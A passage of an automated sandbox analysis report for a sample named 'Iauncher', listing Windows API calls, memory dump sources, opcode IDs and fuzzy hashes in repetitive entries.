                                                                                                                                                                              • PeekMessageW.USER32(?,?,?,?,?), ref: 0744FAA8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePeek
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2222842502-0
                                                                                                                                                                              • Opcode ID: 7bf70b1d91901eaca4e3795a5b618c076b37d3aaa1692ca13ea133b255374b50
                                                                                                                                                                              • Instruction ID: 89af2566794f5a274163dac6392f1f924e59743e31344d8ace05d0f636cb5e2b
                                                                                                                                                                              • Opcode Fuzzy Hash: 7bf70b1d91901eaca4e3795a5b618c076b37d3aaa1692ca13ea133b255374b50
                                                                                                                                                                              • Instruction Fuzzy Hash: 7811F6B6C002499FDB10CF9AD944BDEBBF8EB48320F14842AE918A3251C378A544DFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07449E25
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                                              • Opcode ID: f37233f6ab7c07bc7dbed6995a6e59a1b55b8f1ab5bc9831870a7dfe4671b2f9
                                                                                                                                                                              • Instruction ID: 62ebaef293d32279c4dc9b900408a654c90ae0a4ffbea15303d9078a8ccfb343
                                                                                                                                                                              • Opcode Fuzzy Hash: f37233f6ab7c07bc7dbed6995a6e59a1b55b8f1ab5bc9831870a7dfe4671b2f9
                                                                                                                                                                              • Instruction Fuzzy Hash: C81128B58003499FDB10CF9AC845BDFFBF8EB48320F10841AE558A3240C774A544DFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • PeekMessageW.USER32(?,?,?,?,?), ref: 0744FAA8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePeek
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2222842502-0
                                                                                                                                                                              • Opcode ID: cad77da01013ffd31a0e0ea87cb24cb6643f9a9532c9e563f7b00e55276b86c5
                                                                                                                                                                              • Instruction ID: 2fe994a0e7cbfcf65f020510d298fe694c4f4e29da9bf32637057b2f6c0e6ccd
                                                                                                                                                                              • Opcode Fuzzy Hash: cad77da01013ffd31a0e0ea87cb24cb6643f9a9532c9e563f7b00e55276b86c5
                                                                                                                                                                              • Instruction Fuzzy Hash: B011F6B6C002499FDB10CF9AD944BDEBBF8EB48320F14842AE918A3251C378A544DFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,04E042E0,?,?,?,?), ref: 04E04355
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                                                              • Opcode ID: ac232d58b791cfc89872544b4c0f1bde3c66ba95b32091d26246b6bc4ff0bbac
                                                                                                                                                                              • Instruction ID: 06a0b12ed68c43b46a9a86a2bbe560886c4ff44084ff18ff60f2763d7d2fccfd
                                                                                                                                                                              • Opcode Fuzzy Hash: ac232d58b791cfc89872544b4c0f1bde3c66ba95b32091d26246b6bc4ff0bbac
                                                                                                                                                                              • Instruction Fuzzy Hash: B81166B24043498FCB01DF84D848BDABFF4EF46310F05C197D2289B1A2C339A499CB61
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DispatchMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2061451462-0
                                                                                                                                                                              • Opcode ID: 631645f803c5d42ab238952cc490c813163795d9cc7a3a740f839ddd91d21e17
                                                                                                                                                                              • Instruction ID: c694e96cc6614160c4e8cfa3e37f95a5ddf319c9a766b19806996023e4f517e2
                                                                                                                                                                              • Opcode Fuzzy Hash: 631645f803c5d42ab238952cc490c813163795d9cc7a3a740f839ddd91d21e17
                                                                                                                                                                              • Instruction Fuzzy Hash: 8D1110B5C043599ECB10DF9AD844ACEFBF4EB48324F10852AD819A3610C779A545CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0744A845
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                              • Opcode ID: 61a38b43b9e214d9eee7ef095936dffe28c768b9d73618235d4fc51d7e14e38e
                                                                                                                                                                              • Instruction ID: a60001f786dfbcfa13270bf1a394e5eeaf6bab0f3889fb2880d8f8e037651ba2
                                                                                                                                                                              • Opcode Fuzzy Hash: 61a38b43b9e214d9eee7ef095936dffe28c768b9d73618235d4fc51d7e14e38e
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B1133B59003488FDB20DF9AD449BCEBFF4EB48324F10841AD519A3640D778AA44CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07449E25
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                                              • Opcode ID: c35aa6288962b2822228d2f307833a000a047ccae62db9293c4700c1a0c045c7
                                                                                                                                                                              • Instruction ID: 81827d1bbd3491344c607a698ff58b2bde541e28bb84513648e0ed4e71342cd1
                                                                                                                                                                              • Opcode Fuzzy Hash: c35aa6288962b2822228d2f307833a000a047ccae62db9293c4700c1a0c045c7
                                                                                                                                                                              • Instruction Fuzzy Hash: 2B1106B58003499FDB10CF9AC845BEFFBF8EB48320F14845AE958A3241D779A544DFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00B6D806
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3508225322.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b60000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                              • Opcode ID: 9f65dd08fa76e5719cc1c95cedb6776dfa27cf89ff13ee8b084ec863f2ddee96
                                                                                                                                                                              • Instruction ID: 6cade42fc0a35b50c956fcd3d010e7a1567bf5a167e536b3fb3f4375de5dca3a
                                                                                                                                                                              • Opcode Fuzzy Hash: 9f65dd08fa76e5719cc1c95cedb6776dfa27cf89ff13ee8b084ec863f2ddee96
                                                                                                                                                                              • Instruction Fuzzy Hash: 4211E0B6D003498FCB14DF9AD848ADEFBF4EB88320F10846AD819B7251C779A545CFA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,?,?,?,?,?,?,?,05CB1D39,?,?,00000000), ref: 05CB1DAD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: cd04912a2d83dea4bd3f1a0582319d7874de35b272a9a2e6710119d1fee1ead5
                                                                                                                                                                              • Instruction ID: 70fe6148b7b5972e9bc0dfd3528fab80e60150cf92f8b9b700f2ad1c50d9ccb7
                                                                                                                                                                              • Opcode Fuzzy Hash: cd04912a2d83dea4bd3f1a0582319d7874de35b272a9a2e6710119d1fee1ead5
                                                                                                                                                                              • Instruction Fuzzy Hash: CB1106B58003489FDB10DF9AC885BDEBBF8FB48320F148459E519A3240C379A644CFA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,04E042E0,?,?,?,?), ref: 04E04355
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                                                              • Opcode ID: e440dffd38b530427b90ae919e6a3c1e2016758fd3a3ac3a710ba07a6e24f565
                                                                                                                                                                              • Instruction ID: 0a7793547042e8730c6b858c82a46e0525a1eef09c0db0eb2458f210891cb09c
                                                                                                                                                                              • Opcode Fuzzy Hash: e440dffd38b530427b90ae919e6a3c1e2016758fd3a3ac3a710ba07a6e24f565
                                                                                                                                                                              • Instruction Fuzzy Hash: D211F5B59003499FDB10DF9AC549BDEFBF8EB48324F108459D929A7380C375A944CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetTimer.USER32(?,027F6428,?,?), ref: 09F1EFBD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Timer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2870079774-0
                                                                                                                                                                              • Opcode ID: 3621a81cabc19a88d32e9aa2d168c2818ecc666d1107fade36043471bcd11426
                                                                                                                                                                              • Instruction ID: 6d5733132c42ba9bd8810eaad0ed1da1b40df432d165b1290a6ce666155410bf
                                                                                                                                                                              • Opcode Fuzzy Hash: 3621a81cabc19a88d32e9aa2d168c2818ecc666d1107fade36043471bcd11426
                                                                                                                                                                              • Instruction Fuzzy Hash: B611F2B58043489FDB10DF9AC849BDEBBF8EB48320F108459E919A7240C375A984CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,?,?,?), ref: 05CB17FD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 3f5ec5a75a52269b7f108a000e35455e0fc0a6b9911eed52f686a19343eb524d
                                                                                                                                                                              • Instruction ID: 2fd914afad908b568fb5bc0b7f9de7f6ebbb14b30b3bb9d9f5e4eb3ff5ff7aa3
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f5ec5a75a52269b7f108a000e35455e0fc0a6b9911eed52f686a19343eb524d
                                                                                                                                                                              • Instruction Fuzzy Hash: D01103B68003489FDB10DF9AC885BDFBBF8FB48320F148419E918A3240C375A644CFA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0744A845
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                              • Opcode ID: c1a7d01f0c91616a4aed04549f493fcb13265b66654aa41cbe07309d5290559f
                                                                                                                                                                              • Instruction ID: 6440e405a73bd1776bd16f86338c7a2c6c6433cfa75503a27919e5fae12a6019
                                                                                                                                                                              • Opcode Fuzzy Hash: c1a7d01f0c91616a4aed04549f493fcb13265b66654aa41cbe07309d5290559f
                                                                                                                                                                              • Instruction Fuzzy Hash: 341100B59003498FDB20DF9AC449BDEBBF4EB48324F20885AE919A7340D774A945CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DispatchMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2061451462-0
                                                                                                                                                                              • Opcode ID: 02180d2852c7f723b456e3fbbc112a8e20cc3fe28531e16d36a93d3b208fb394
                                                                                                                                                                              • Instruction ID: 8944f5d3fa62b496e3f5082029365ef13169bc5cddb1793be1462535bfad6456
                                                                                                                                                                              • Opcode Fuzzy Hash: 02180d2852c7f723b456e3fbbc112a8e20cc3fe28531e16d36a93d3b208fb394
                                                                                                                                                                              • Instruction Fuzzy Hash: B3111DB5C002488FCB14DF9AD845BDEFBF4EB88320F10806AE819A3250C778A644CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetTimer.USER32(?,027F6428,?,?), ref: 09F1EFBD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Timer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2870079774-0
                                                                                                                                                                              • Opcode ID: 7dacda1b6d44d074e0ac3e227afdddc180d71b4ed434f91da1473f995160bd31
                                                                                                                                                                              • Instruction ID: 5f641ddbfdd5f6c5035543e48c963d5b32cd430f270990a1bb1e7c093c95fd17
                                                                                                                                                                              • Opcode Fuzzy Hash: 7dacda1b6d44d074e0ac3e227afdddc180d71b4ed434f91da1473f995160bd31
                                                                                                                                                                              • Instruction Fuzzy Hash: 5011E0B58003489FDB14DF99D885BDEFBF8FB48320F20841AE959A3650C375A584CFA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,?,?,?), ref: 05CB17FD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 8895e97a12315b2f8d928665e4664a8d235c20ec12ad5fee64609d5cadd096b5
                                                                                                                                                                              • Instruction ID: 4fac5dd130635219ee2760ba32531ee29318bf750e0ef313e7d1143b05d71c17
                                                                                                                                                                              • Opcode Fuzzy Hash: 8895e97a12315b2f8d928665e4664a8d235c20ec12ad5fee64609d5cadd096b5
                                                                                                                                                                              • Instruction Fuzzy Hash: 2511D3B58003499FDB10DF9AD845BDFBBF8FB48320F148459D919A7240C775A644CFA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DispatchMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2061451462-0
                                                                                                                                                                              • Opcode ID: 9a6e6a76be00cb83bd838d54e82386820d154a458880abf31252d9b01a83dc6b
                                                                                                                                                                              • Instruction ID: 63a5a9c170a95d42673a292aaaf2f3895caee53194978ab79ec1e5e5c2f099eb
                                                                                                                                                                              • Opcode Fuzzy Hash: 9a6e6a76be00cb83bd838d54e82386820d154a458880abf31252d9b01a83dc6b
                                                                                                                                                                              • Instruction Fuzzy Hash: 37110DB5C003598FCB14DF9AD848BCEFBF8EB88324F10842AD818A3250C779A544CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,04E042E0,?,?,?,?), ref: 04E04355
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                                                              • Opcode ID: c750c237c26742eb11da520576915c861a989a31140da1ab7d865f39ba3b171d
                                                                                                                                                                              • Instruction ID: 4f0f4429624eb595368d791e4c772b39c4ec1cac14d8ce9eb530ce94cbf92843
                                                                                                                                                                              • Opcode Fuzzy Hash: c750c237c26742eb11da520576915c861a989a31140da1ab7d865f39ba3b171d
                                                                                                                                                                              • Instruction Fuzzy Hash: DB11F2B5800349CFDB10CF99D585BDEFBF4EB48324F10851AD928A7280C778A984CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DispatchMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2061451462-0
                                                                                                                                                                              • Opcode ID: 9091b0693e59f319681057d672870bc7ca2379da2d41500e9b6b8052616b4209
                                                                                                                                                                              • Instruction ID: 2a8dff122ae0ada4b3662e0cb5190476a59ef4158e8eebd0fb65239348bb7d4b
                                                                                                                                                                              • Opcode Fuzzy Hash: 9091b0693e59f319681057d672870bc7ca2379da2d41500e9b6b8052616b4209
                                                                                                                                                                              • Instruction Fuzzy Hash: 431112B5C003488FCB14DF9AD844BCEFBF4EB48320F10841AD858A3240C378A644CFA5
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,?,?,?,?,?,?,?,05CB1D39,?,?,00000000), ref: 05CB1DAD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 410deb969a6c7d12fb0a33ee0dd9e9848ec460591bc7ec87a5f0e5ec80b7d21f
                                                                                                                                                                              • Instruction ID: 7b006f1a4975438d73dd06778f85d3561764e20d66288a9f175610ea3b3a460d
                                                                                                                                                                              • Opcode Fuzzy Hash: 410deb969a6c7d12fb0a33ee0dd9e9848ec460591bc7ec87a5f0e5ec80b7d21f
                                                                                                                                                                              • Instruction Fuzzy Hash: 96F0E7B58003099FDB10DF99D448BDEBBF4FB48324F14885AE559A7250C379A594CFA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 04f41bb5ba89e4da704884c194a4cde52c825d1a7f81121f5feca66bc8e10682
                                                                                                                                                                              • Instruction ID: b1285a739f650691e540d54cde10794dcc953867ea874fc8047dc527037aaab3
                                                                                                                                                                              • Opcode Fuzzy Hash: 04f41bb5ba89e4da704884c194a4cde52c825d1a7f81121f5feca66bc8e10682
                                                                                                                                                                              • Instruction Fuzzy Hash: A4E1B275A40B06CBEB10EF18DC44BDF7732AF46722F954490EA097B2C5DBB4B989CA41
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 71bf35eaf5379c8512b6d83ad3c9b881001ffc225b4d8ee143291a88af3ee95d
                                                                                                                                                                              • Instruction ID: 613cf58ddc6c6a4229a70ccc708f1ed14c2f2c09e4ef8cd8f3f319b6d7d06433
                                                                                                                                                                              • Opcode Fuzzy Hash: 71bf35eaf5379c8512b6d83ad3c9b881001ffc225b4d8ee143291a88af3ee95d
                                                                                                                                                                              • Instruction Fuzzy Hash: DEE1A075A40B06CBEB10EF18DC44BDF7732AF46722F954490EA097B2C5DBB4B989CA41
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 34b74becc30a857e2b00d5e3a3c2e5f4c9a26094d8b478810588bd4d1291e6b1
                                                                                                                                                                              • Instruction ID: b7307044bac49e33fd5daddc5a60e7d9ec8bc207a3a876a7ab3ee0f61c50cd07
                                                                                                                                                                              • Opcode Fuzzy Hash: 34b74becc30a857e2b00d5e3a3c2e5f4c9a26094d8b478810588bd4d1291e6b1
                                                                                                                                                                              • Instruction Fuzzy Hash: 90612B75E006488FDB04DFE9C848BDEBBB2FF89314F158169E509AB355DB70A989CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b10c4c161c93cc484146cb166a152ce92605656293ce4d08623ef7cc57f8d700
                                                                                                                                                                              • Instruction ID: 7d90f51ae8f1a7bb389774ee959edefa8ec9b9964bd1c2162bbfd493acedf8bc
                                                                                                                                                                              • Opcode Fuzzy Hash: b10c4c161c93cc484146cb166a152ce92605656293ce4d08623ef7cc57f8d700
                                                                                                                                                                              • Instruction Fuzzy Hash: 77613D75E00248CFDB04DFE9C858ADEBBB2FF89314F158569E509AB355DB70A889CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5e6dde3a4f29cc62ce4e5737963dae468418fc2af85bef779359bf24fd91c8bc
                                                                                                                                                                              • Instruction ID: fc637835b4c18a8c2afcc0d9cb7bcd2e4fd040ec9a9a30167d28036c1422eb46
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e6dde3a4f29cc62ce4e5737963dae468418fc2af85bef779359bf24fd91c8bc
